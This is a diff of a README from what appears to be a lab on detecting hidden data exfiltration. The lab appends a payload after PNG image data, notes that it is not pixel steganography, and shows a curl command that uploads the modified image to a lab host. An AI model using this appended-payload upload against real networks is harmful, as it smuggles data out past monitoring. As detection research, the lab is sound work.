WiLL75G/hidden-data-exfiltration-detection-lab/README.md

 BEC85B9965F2B109793D7540933E2AA24CEA8F7721360A260213BD535EF4F50F
 ```

-The size difference was:
+The difference between the samples was:

 ```text
 17,901 - 17,824 = 77 bytes
 ```

-The modified carrier still rendered as an image.
+The modified carrier continued to render normally as a PNG.

-### Ground Truth

-The known marker gave me something deterministic to validate later.

-Instead of assuming the additional data survived the transfer, I could prove it.
+### Important Technical Distinction

+The payload was appended after the PNG data.

+It was **not hidden inside image pixels**.

+This distinction is important because the experiment should not be represented as LSB or general steganography detection.

 ---

-# Phase 3 — Transfer the Modified Carrier
+# Phase 3: Transfer the Modified Carrier

-The modified image followed the same path:
+The modified carrier followed exactly the same network path:

 ```powershell
 curl.exe -X POST --data-binary "@C:\StegoLab\stego.png" -H "Content-Type: image/png" http://192.168.64.12:8081/upload